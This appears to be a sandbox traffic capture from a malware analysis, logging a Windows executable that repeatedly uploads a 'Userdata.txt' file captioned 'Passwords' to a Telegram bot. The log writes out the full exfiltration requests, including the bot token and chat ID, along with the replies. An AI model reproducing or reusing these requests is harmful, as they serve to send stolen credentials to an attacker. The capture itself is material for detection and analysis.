2025-01-10 21:44:32 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43654,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545472,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50057	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:33 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3498c045968a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:33 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 39 38 63 30 34 35 39 36 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3498c045968aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:33 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:33 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43655,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545473,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50059	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:35 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34bc362efad8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:35 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 62 63 33 36 32 65 66 61 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34bc362efad8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:35 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:35 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43656,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545475,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50061	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:36 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34e226fe6ed0 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:36 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 65 32 32 36 66 65 36 65 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34e226fe6ed0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:36 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:36 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43657,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545476,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50063	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:38 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd350bc3e4dbe2 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:38 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 30 62 63 33 65 34 64 62 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd350bc3e4dbe2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:38 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:38 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43658,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545478,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50065	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:39 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3537da7c3adb Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:39 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 33 37 64 61 37 63 33 61 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3537da7c3adbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:40 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:40 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43659,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545480,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50068	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:41 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd356145cdd8a1 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:41 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 36 31 34 35 63 64 64 38 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd356145cdd8a1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:41 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:41 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43660,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545481,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50070	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:43 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35896607e1dd Host: api.telegram.org Content-Length: 1090
2025-01-10 21:44:43 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 38 39 36 36 30 37 65 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35896607e1ddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:43 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:43 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43661,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545483,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50072	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:44 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35c03d1e8178 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
